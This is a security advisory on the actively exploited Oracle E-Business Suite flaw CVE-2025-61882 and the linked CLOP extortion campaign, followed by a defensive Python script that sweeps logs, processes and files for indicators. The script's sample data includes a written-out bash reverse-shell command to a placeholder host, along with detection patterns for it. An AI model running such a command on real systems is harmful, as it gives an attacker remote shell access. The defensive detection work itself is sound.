THE THREAT
On October 4th, 2025, Oracle released a security advisory addressing a critical zero-day vulnerability impacting its E-Business Suite (EBS), identified during Oracle's investigation into the recently disclosed extortion campaign targeting EBS customers. CVE-2025-61882 (CVSS: 9.8) resides in the BI Publisher Integration of the Oracle Concurrent Processing component of EBS. It allows an unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful exploitation gives the attacker complete control of the component, which in practice means Remote Code Execution (RCE).
Oracle released the advisory following the Google Threat Intelligence Group's (GTIG) disclosure of an extortion email campaign likely tied to the CLOP (aka Cl0p, FIN11, TA505) data theft and extortion group. Although CLOP is suspected of running the campaign, a second group, calling itself Scattered LAPSUS$ Hunters, has also claimed involvement: it published Proof-of-Concept (PoC) exploit code on Telegram, stating that its exploit had been leaked and sold to CLOP.
Given the active exploitation of CVE-2025-61882, the involvement of a well-known extortion group, and the public availability of PoC exploit code, organizations should apply Oracle's patches immediately and bring EBS up to the latest supported version. Oracle's alert [1] also states the prerequisite patch level the fix depends on; confirm that level is in place before applying the patch, or the fix will not install.
Researchers from GTIG identified a "high-volume extortion campaign", observing extortion emails dated around September 29th, 2025. The emails, sent to executives at various organizations, claimed that the threat actor had breached the recipients' Oracle EBS systems and exfiltrated sensitive data. GTIG linked the campaign to CLOP, a group known for running extortion campaigns from compromised email accounts; at least one email address previously associated with the group appeared in the observed extortion note.
Shortly after GTIG's update, Oracle confirmed that the extortion campaign was genuine, indicating that vulnerabilities from its July 2025 patch release had been exploited, without naming which ones. On October 4th, 2025, Oracle disclosed that CVE-2025-61882 had been exploited in the campaign and released patches for it. The flaw is rated low attack complexity, needs no privileges and no user interaction, and is reachable over the network, so it can be exploited remotely without authentication. Oracle's advisory also lists the IoCs observed during its investigation into the campaign.
Google Mandiant's Chief Technology Officer, Charles Carmakal, stated that CLOP exploited vulnerabilities in Oracle EBS in August 2025, including flaws patched in July 2025 as well as CVE-2025-61882. Although Oracle has not confirmed which of the July vulnerabilities were exploited, three of them are remotely exploitable: CVE-2025-30745, CVE-2025-30746, and CVE-2025-50107.
Despite the Scattered LAPSUS$ Hunters claim that CLOP stole their exploit, there is concern that the two groups may be collaborating on a widespread extortion campaign. Scattered LAPSUS$ Hunters have signalled their intention to target Oracle EBS again with another exploit, which they describe as a "better chained version that exploits EBS".
Because PoC exploit code for CVE-2025-61882 is public, it is highly likely that other threat actors will target vulnerable instances in the near future. Given the criticality of the flaw, the scope of the extortion campaign, and the public PoC, organizations should patch CVE-2025-61882 and the other potentially exploited July 2025 vulnerabilities to mitigate the risk. Organizations that have received the extortion emails are encouraged to investigate for a breach (the web-tier access logs, unexpected processes running under the EBS application accounts, and the IoCs in Oracle's advisory are the natural starting points, since the vulnerability is reached over HTTP), report the extortion attempt to law enforcement, and not pay the ransom, as payment does not guarantee that stolen data will be deleted.
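The investigation the advisory recommends, and the IoC list Oracle published that it points to, can be turned into a repeatable sweep. The script below is an added example, not code from eSentire, Oracle or GTIG: it takes an indicator list (defanged IPs, SHA-256 file hashes, command-line patterns) and runs it over web-tier access log lines, a process listing, and file contents. Every indicator value and log line in it is a constructed placeholder (TEST-NET addresses, a hash of a made-up file); replace them with the IoCs from Oracle's alert [1] and your own evidence. The `/dev/tcp/` pattern is the generic bash reverse-shell idiom, included as an assumption about what post-exploitation activity would look like, not an indicator taken from the page.

```python
"""IoC sweep for an Oracle EBS incident (added example; all indicators are constructed)."""
import hashlib
import re
from dataclasses import dataclass


def refang(indicator: str) -> str:
    """Convert a defanged indicator ('203[.]0[.]113[.]45', 'hxxp://') to its live form."""
    return (indicator.replace("[.]", ".")
                     .replace("hxxps://", "https://")
                     .replace("hxxp://", "http://"))


# Constructed placeholder indicators. These are NOT the IoCs from Oracle's alert;
# load the real ones from reference [1] before running this against evidence.
IOC_IPS = {refang("203[.]0[.]113[.]45"), refang("198[.]51[.]100[.]7")}
IOC_SHA256 = {hashlib.sha256(b"constructed exploit archive").hexdigest()}
# Assumption: a post-exploitation reverse shell uses the bash /dev/tcp idiom.
IOC_CMD_PATTERNS = [re.compile(r"/dev/tcp/\S+"), re.compile(r"bash -i\b")]

# Combined-format access log line (Apache/OHS): client IP, timestamp, request line, status.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


@dataclass(frozen=True)
class Hit:
    source: str      # which evidence set matched
    indicator: str   # the IoC value that matched
    evidence: str    # the raw line or the file path


def sweep_access_log(lines, ioc_ips=IOC_IPS):
    """Flag requests whose client IP is on the IoC list; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m.group("ip") in ioc_ips:
            hits.append(Hit("access_log", m.group("ip"), line.rstrip()))
    return hits


def sweep_process_list(lines, patterns=IOC_CMD_PATTERNS):
    """Flag command lines (e.g. from `ps -eo user,pid,args`) matching reverse-shell patterns."""
    hits = []
    for line in lines:
        for pat in patterns:
            m = pat.search(line)
            if m:
                hits.append(Hit("process_list", m.group(0), line.rstrip()))
                break  # one hit per process is enough
    return hits


def sweep_files(files, ioc_hashes=IOC_SHA256):
    """files: mapping path -> bytes. Flag files whose SHA-256 is on the IoC list."""
    hits = []
    for path, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        if digest in ioc_hashes:
            hits.append(Hit("file_hash", digest, path))
    return hits


def run_sweep(access_lines, ps_lines, files):
    """Run all three sweeps and return the combined hit list in evidence order."""
    return sweep_access_log(access_lines) + sweep_process_list(ps_lines) + sweep_files(files)


# Constructed sample evidence, not real logs or processes.
SAMPLE_ACCESS_LOG = [
    '10.0.0.12 - - [02/Oct/2025:08:15:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120',
    '203.0.113.45 - - [02/Oct/2025:08:16:43 +0000] "POST /OA_HTML/AppsLogin HTTP/1.1" 200 2048',
    '198.51.100.7 - - [02/Oct/2025:08:17:09 +0000] "GET /OA_HTML/ HTTP/1.1" 302 0',
    "garbage line that does not parse",
]
SAMPLE_PROCESS_LIST = [
    "applmgr 4120 /u01/app/fs1/FMW_Home/jdk/bin/java -Dweblogic.Name=oacore_server1",
    "applmgr 9942 sh -c /bin/bash -i >& /dev/tcp/203.0.113.45/4444 0>&1",
    "oracle 1201 ora_pmon_EBSDB",
]
SAMPLE_FILES = {
    "/tmp/constructed.zip": b"constructed exploit archive",
    "/tmp/benign.txt": b"nothing to see here",
}

if __name__ == "__main__":
    for hit in run_sweep(SAMPLE_ACCESS_LOG, SAMPLE_PROCESS_LIST, SAMPLE_FILES):
        print(f"[{hit.source}] {hit.indicator}: {hit.evidence}")
```

Feed the real inputs by reading the OHS/Apache access logs from the EBS web tier into `sweep_access_log`, the output of `ps -eo user,pid,args` into `sweep_process_list`, and the bytes of any recently created files under the application and temp directories into `sweep_files`. A hit on an IoC IP against `/OA_HTML/` paths is a trigger for full incident response, not a signal to keep triaging; absence of hits only means the indicators Oracle published were not seen, since the actor can change infrastructure at will.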
Impacted Versions List:
References:
[1] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-61882
[3] https://www.cyber.gc.ca/en/guidance/profile-ta505-cl0p-ransomware
[4] https://www.resecurity.com/blog/article/trinity-of-chaos-the-lapsus-shinyhunters-and-scattered-spider-alliance-embarks-on-global-cybercrime-spree
[5] https://www.linkedin.com/posts/austin-larsen_threatintelligence-cybersecurity-clop-activity-7379316941762727936-h8sR/
[6] https://www.linkedin.com/feed/update/urn:li:activity:7379498157208027136/
[7] https://nvd.nist.gov/vuln/detail/CVE-2025-30745
[8] https://nvd.nist.gov/vuln/detail/CVE-2025-30746
[9] https://nvd.nist.gov/vuln/detail/CVE-2025-50107